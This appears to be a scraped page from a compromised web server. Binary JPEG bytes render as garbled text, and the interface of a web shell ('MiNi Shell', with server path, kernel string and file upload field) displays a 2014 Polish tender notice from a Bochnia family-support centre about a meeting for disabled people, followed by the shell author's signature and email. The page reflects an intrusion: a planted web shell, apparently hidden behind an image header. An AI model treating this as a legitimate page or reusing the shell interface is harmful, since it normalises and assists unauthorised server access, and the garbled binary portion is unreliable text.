JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141008/212927-N-2014.html

<p class="kh_header"><b>Bochnia: Zorganizowanie spotkania o charakterze edukacyjno-rekreacyjnym w ramach realizowanego projektu pn. Wzmacnianie integracji społecznej w Powiecie Bocheńskim</b><br>
<b>Numer ogłoszenia: 212927 - 2014; data zamieszczenia: 08.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. G. Windakiewicza 9/5, 32-700 Bochnia, woj. małopolskie, tel. 14 611 97 40, faks 14 611 97 40.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie spotkania o charakterze edukacyjno-rekreacyjnym w ramach realizowanego projektu pn. Wzmacnianie integracji społecznej w Powiecie Bocheńskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja spotkania o charakterze edukacyjno-rekreacyjnym, zwanego dalej spotkaniem dla maksymalnie 100 osób, w tym trzy osoby z kadry zamawiającego oraz osoby niepełnosprawne i osoby z najbliższego otoczenia osób niepełnosprawnych, tj. ze środowiska sąsiedzkiego, rodzinnego i koleżeńskiego. Zamawiający wymaga, aby miejsce realizacji spotkania integracyjnego znajdowało się na terenie miasta Bochnia, w promieniu do 2 km od głównego przystanku autobusowego przy ul. Pułaskiego. Celem spotkania jest pogłębienie świadomości uczestników projektu nt. lokalnych walorów turystycznych, w tym kopalni soli wpisanej 23 czerwca 2013 r. na Listę Światowego Dziedzictwa Kulturowego i Przyrodniczego Ludzkości UNESCO oraz kształtowanie poczucia tożsamości w środowisku lokalnym poprzez zdobycie informacji oraz ich utrwalenie na temat górnictwa, jako nieodłącznego elementu gospodarczego i turystycznego miasta Bochnia oraz wpływu górnictwa na rozwój miasta, w tym turystyki. Na bazie turystycznych zasobów lokalnych mogą kształtować się zainteresowania zawodowe uczestników projektu, którzy będą gotowi do uaktywnienia zawodowego w rozwijającej się branży turystycznej. Spotkanie o charakterze edukacyjno-rekreacyjnym powinno przyczynić się do zwiększenie poczucia przynależności do społeczności lokalnej oraz  pomóc w czynnym angażowaniu się uczestników do aktywniejszego udziału w życiu społecznym i do integracji osób z ograniczoną sprawnością fizyczną i psychiczną z osobami zdrowymi. Uczestnikami spotkania będą osoby niepełnosprawne posiadające zaburzenia psychosoamatyczne, ze szczególnym uwzględnieniem osób po przeżytych kryzysach psychicznych i o obniżonej sprawności emocjonalnej. Wśród uczestników będą osoby niepełnosprawne, które charakteryzuje apatia i znużenie, ale także osoby, które są nadpobudliwe i niespokojne. Osoby niepełnosprawne będące uczestnikami projektu dobrze czują się w grupie sobie znanych osób, jednakże w towarzystwie obcych ludzi stają się  niespokojni, lękliwi i wycofują się z aktywności. Aby temu zapobiec i dodać pewności siebie oraz zapewnić poczucie bezpieczeństwa do udziału w spotkaniu zaproszone zostaną również osoby z ich najbliższego otoczenia członkowie rodziny, bliscy znajomi. Miejsce organizacji spotkania powinno chronić uczestników od niekorzystnych warunków atmosferycznych, powinno sprzyjać zarówno rekreacji, jak i uczestnictwu w zajęciach animacyjnych, dzięki którym uczestnicy utrwalą wiadomości zdobyte wcześniej m.in. podczas innych działań środowiskowych w projekcie i podczas prelekcji na temat górnictwa i roli kopalni soli w życiu mieszkańców Bochni. Podczas spotkania Wykonawca winien wykonać zajęcia animacyjne, które powinny mieć charakter relaksacyjny, tj. aktywne spędzenie czasu wolnego ma prowadzić do odreagowania stresów związanych z pracą i obowiązkami codziennymi, integracyjny powinny integrować uczestników spotkania i doprowadzić do umacniania nawiązanych znajomości, motywacyjny zajęcia animacyjne mają mobilizować uczestników do aktywnego spędzania czasu wolnego progresywny udział w zajęciach animacyjnych ma prowadzić do samorozwoju uczestnika poprzez zdobycie i utrwalenie wiadomości w formie zabawy, tj. quiz obejmujący zagadnienia poruszone podczas prelekcji, konkursy i konkurencje z nagrodami. Zaprojektowane zajęcia animacyjne powinny przyczynić się do wzmocnienia i nawiązania kontaktów interpersonalnych. Wspólny udział w zabawie powinien przyczynić się do zwiększenia umiejętności społecznych i pewności siebie. Program spotkania powinien zmierzać do ukształtowania prawidłowych postaw i zachowań oraz pokazać, jak wykorzystywać zasoby lokalne w celu realizowania własnych pomysłów, które służą samorealizacji zawodowej. Spotkanie o charakterze edukacyjno-zawodowym powinno być  źródłem pozytywnych wspomnień oraz miłych wrażeń, a także powinno zapewnić uczestnikom swobodne i nieskrępowane zachowanie podczas udziału w zajęciach animacyjnych. Zajęcia animacyjne powinny w sposób bezpośredni oraz osobisty angażować uczestników do zabawy i integracji. Animatorzy powinni zwrócić uwagę na fakt, aby zajęcia animacyjne nie narażały uczestników spotkania na ośmieszenie. W programie spotkania należy uwzględnić: Prelekcję 45 60 minut na temat dziejów górnictwa solnego i roli kopalni soli w kształtowaniu się miasta Bochnia pod względem społecznym, turystycznym i gospodarczym, inicjatywy społeczne i działalność wspomagająca rozwój gospodarczy, w tym rozwój przedsiębiorczości w mieście Bochnia służące zapobieganiu bezrobociu i rozwojowi życia mieszkańców Bochni w ujęciu historycznym i współcześnie oraz na temat możliwości rozwoju społecznego i gospodarczego regionu w oparciu o lokalną bazę turystyczną w tym możliwości tworzenia miejsc pracy dla osób niepełnosprawnych w branży turystycznej  Spotkanie z przewodnikiem w stroju górniczym możliwość zapewnienia zadawania pytań na temat pracy przewodnika w Kopalni Soli Konkurs wiedzy w zakresie tematów wysłuchanej prelekcji. W ramach utrwalenia zdobytych wiadomości Wykonawca zobowiązuje się do przygotowania zajęć animacyjnych służących utrwaleniu zdobytych informacji tj. quiz, konkursy i konkurencje sportowe z nagrodami wraz z przyznaniem dyplomów i drobnych nagród. Animowane gry i zabawy integracyjne w tradycji górniczej np. przeciąganie liny, skok przez łatę, tworzenie górniczego godła, prezentacja szpaleru górników Przekazanie drobnych pamiątek solnych uczestnikom spotkania. Zabawa taneczna przy muzyce z DJ, Wydanie gorącego posiłku. Podczas spotkania należy zorganizować przerwę na gorący dwudaniowy posiłek dla maksymalnie 100 osób, w tym wydanie: zupa jarzynowa 250gos, ziemniaki 150gos,  devolay 260gos, zestaw surówek 120 gos, kompot owocowy 250mlos oraz 5 l wody mineralnej niegazowanej w dzbankach, 5 l wody gazowanej w dzbankach, 7 l soków wieloowocowych w dzbankach. Wykonawca zapewni dostęp do gorących napojów - kawy i herbaty wraz z dodatkami tj. mleko, cukier, cytryna w ilości 500 mlos. Posiłek  powinien zostać podany na ceramicznej szkalnej zastawie, wyklucza się możliwość podania poczęstunku przy użyciu plastikowych pojemników i sztućcy. Wykonawca powinien zapewnić talerze, szklankifiliżanki, sztućce i serwetki w ilości adekwatnej do liczby uczestników spotkania oraz adekwatną ilość miejsc na spożycie gorącego posiłku (wyklucza się szwedzki stół) Wydanie paczkowanego poczęstunku. Wykonawca zobowiązany jest do przygotowania paczek z poczęstunkiem dla każdego z uczestników, które zawierają: ciastka 100 gos, paluszki solone 200gos, jabłko 1 sztos, banan 1 sztos, baton 50gos, woda mineralna niegazowana 0,5 los, napój owocowy 0,5 los. Prelekcja powinna być poprzedzona krótką ankietą skierowaną do wszystkich uczestników i badającą stan wyjściowy wiedzy uczestników. Tą samą ankietą należy zbadać wiedzę uczestników pod koniec spotkania. Wyniki ankiety będą uwzględnione w ocenie prawidłowości wykonania usługi w zakresie przygotowania i przeprowadzenia prelekcji. Zleceniodawca oczekuje, że prawidłowo przeprowadzona prelekcja wpłynie na wzrost wiedzy uczestników spotkania i będzie impulsem dla kształtowania się zainteresowań zawodowych uczestników Poruszanie i przemieszczanie się po obiekcie nie powinno stwarzać barier architektonicznych. Przestrzeń konieczna do uczestnictwa osób niepełnosprawnych w spotkaniu powinna spełniać normy odpowiadające potrzebom osób niepełnosprawnych (zachowanie odpowiedniej wolnej  przestrzeni ze względu na konieczność manewrowania wózkiem inwalidzkim, zapewnienie swobodnego poruszania się w przestrzeni, w której nie powinny znajdować się żadne przeszkody). Spotkanie winno być zorganizowane do 12 listopada 2014 r. w powszedni dzień tygodnia, tj: w poniedziałek lub we wtorek. Wykonawca musi zapewnić Udostępnienie pomieszczeń na organizację spotkania, w których odbędą się prelekcja oraz zajęcia animacyjne. Stoły, krzesła, ławy/ławki - miejsca przygotowane do odpoczynku i skonsumowania posiłków dla uczestników spotkania  Nagłośnienie (mikrofon i głośniki o mocy obejmującej teren realizacji imprezy), sprzęt do odtwarzania muzyki i muzykę do publicznego odtwarzania opłaconą lub zwolnioną z opłat dla ZAiKS, STOART ZPAV czy SAWP oraz osobę obsługująca ten sprzęt. Zleceniobiorca będzie zobowiązany oświadczyć, że w każdym przypadku, w którym w trakcie lub w związku z wykonywaniem zlecenia będzie korzystał z praw autorskich lub innego rodzaju własności intelektualnej - koszty tego wykorzystania są wliczone w koszty usługi Zapewnienie dostępu do toalet na terenie miejsca realizacji imprezy, w tym także toalety dostosowanej do potrzeb osób poruszających się na wózkach inwalidzkich. Udostępnienie przestrzeni, na której odbędzie się impreza integracyjna do wyeksponowania materiałów promocyjno-informacyjnych afiszy A3+ Tu realizowany jest projekt pn. Wzmacnianie integracji społecznej w Powiecie Bocheńskim Zapewnienie uczestnikom jednego pomieszczenia zamykanego na klucz służącego do przechowywania rzeczy. Zapewnienie i udostępnienie w razie konieczności apteczki wyposażonej w środki opatrunkowe. Zapewnienie usług 3 animatorów, którzy poprowadzą prelekcję oraz zajęcia animacyjne. Zapewnienie ubezpieczenia NNW dla maksymalnie 100 uczestników spotkania na kwotę minimalną 10.000 złotych na każdą osobę. Kserokopia dokumentu potwierdzającego ubezpieczenie Wykonawca przedłoży Zamawiającemu wraz z fakturą VAT  rachunkiem po zakończeniu spotkania, Umożliwienie wykonywania zdjęć podczas udziału uczestników spotkania w poszczególnych punktach programu dla celów dokumentacji Zamawiającego. Przedłożenie programu spotkania zawierającego treść prelekcji główne wątki prelekcji z krótkim opisem z uwzględnieniem źródła pochodzenia informacji i wykorzystane pomoce dydaktyczne oraz  planu spotkania zawierającego termin realizacji, godziny z podziałem na poszczególne punkty programu wraz z konspektami dotyczącymi konkursu wiedzy oraz animowanych gier i zabaw, który będzie przedstawiony uczestnikom spotkania. Wykonawca powinien udostępnić przestrzeń, na której odbędzie się spotkanie integracyjne do wyeksponowania materiałów promocyjno-informacyjnych, afiszy A3+ Tu realizowany jest projekt pn. Wzmacnianie integracji społecznej w Powiecie Bocheńskim w ilości nie mniej niż 6 szt. Umożliwienie wejścia na spotkanie osobom, które nie będą mogły przybyć punktualnie. Zabezpieczenie terenu imprezy przed wstępem osób niezaproszonych. Ocena realizacji zlecenia będzie rozliczana i mierzona następująco: Potwierdzenie przez uczestników spotkania odbioru paczkowanego poczęstunku i gorącego posiłku, Potwierdzenie przez uczestników odbioru nagród wraz z ich specyfikacją, Stwierdzenie przez pracownika zamawiającego obecnego na spotkaniu, czy zlecenie zostało wykonane prawidłowo w zakresie: Wykonania prelekcji wyczerpując treści i metody wskazane przez Zleceniobiorcę w ofercie. Pracownik zamawiającego ma prawo dokonać oceny przystępności dla uczestników sposobu podania treści prelekcji. Przeprowadzenia konkursu wiedzy dla uczestników. Pracownik zamawiającego ma prawo dokonać oceny wiedzy uczestników, która wynika z udziału w prelekcji i aktywności uczestników jako wyniku zachęty ze strony animatora konkursu (np. ile osób zgłaszało się do odpowiedzi, ile odpowiedzi było poprawnych) Zorganizowania spotkania dla uczestników z przewodnikiem, Zorganizowania zabawy tanecznej z DJ dla uczestników, Dostępności mikrofonów i funkcjonowania nagłośnienia, Dostępności apteczki wyposażonej w podstawowe środki pierwszej pomocy, Oddania do dyspozycji zamawiającemu jednego pomieszczenia zamykanego na klucz, Wyeksponowania w miejscu realizacji zamówienia 6 szt afiszy promocyjnych z treścią Tu realizowany jest projekt Konkursu wiedzy lista pytań konkursowych wraz z prawidłowymi odpowiedziami. Wypełnione formularze ankiety ewaluacyjnej (przed i po prelekcji. Konspekty przeprowadzonych gier i zabaw zespołowych z informacją o nazwiskach uczestników biorących udział w grach i zabawach oraz informacją o nazwiskach i kwalifikacjach animatorów w odniesieniu do informacji zawartych w ofercie na realizację usługi. Kserokopia polisy ubezpieczeniowej NNW na kwotę minimalną 10.000 złotych na każdą osobę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 55.32.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia 
w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 
6 miesięcy przed upływem terminu składania wniosków o dopuszczenie 
do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług o podobnej tematyce, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie wg załącznika nr 5 do SIWZ
b.	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami wg załącznika nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, że Wykonawca znajduje się w sytuacji ekonomicznej 
i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnieniu warunków określonych przepisami art 22 ust 1 ustawy - złącznik 2 do SIWZ
W zakresie wykazania spełnienia przez Wykonawcę warunków, o których mowa w art 22 ust 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu należy przedłożyć:
wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, o podobnym przedmiocie zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania 
i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie wg załącznika nr 5 do SIWZ
wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez 
nie czynności, oraz informacją o podstawie do dysponowania tymi osobami 
wg załącznika nr 6 do SIWZ 
W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust 1 ustawy, należy przedłożyć: 
oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 ustawy - załącznik nr 4 do SIWZ 
aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału 
w postępowaniu o udzielenie zamówienia albo składania ofert,
oświadczenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
Formularz ofertowy o treści zgodnej z określoną we wzorze stanowiącym załącznik nr 1 do SIWZ).
Dokument (np. pełnomocnictwo, umowa spółki cywilnej, zaświadczenie o wpisie do ewidencji działalności gospodarczej, itp) potwierdzający, iż oferta została podpisana przez osoby/ę uprawnioną do reprezentowania Wykonawcy - o ile nie wynika to z innych dokumentów załączonych do oferty. 
Zaakceptowany wzór umowy ( stanowi załącznik nr 7 do SIWZ).
Oświadczenie Wykonawcy, że zapoznał się z zakresem zamówienia oraz uzyskał wszelkie niezbędne informacje w celu przygotowania i złożenia oferty z należytą starannością.
Oświadczenie, że obiekt w którym realizowane będzie spotkanie integrujące dostosowane jest potrzeb osób niepełnosprawnych.
Oświadczenie o dysponowaniem miejscem położonym na terenie miasta BOCHNIA.
Oświadczenie o opłaceniu lub zwolnieniu z opłat dla ZAiKS, STOART ZPAV czy SAWP
Przedłożenie programu spotkania zawierającego treść prelekcji główne wątki prelekcji z krótkim opisem z uwzględnieniem źródła pochodzenia informacji i wykorzystane pomoce dydaktyczne oraz  planu spotkania zawierającego termin realizacji, godziny z podziałem na poszczególne punkty programu wraz z konspektami dotyczącymi konkursu wiedzy oraz animowanych gier i zabaw, który będzie przedstawiony uczestnikom spotkania.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.malopolska.pl/pcprwbochni/Article/id,254976.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Bochni ul. Windakiewicza 9/5
32-700 Bochnia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2014 godzina 11:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Bochni ul. Windakiewicza 9/5
32-700 Bochnia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn Wzmacnianie integracji społecznej w Powiecie Bocheńskim.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com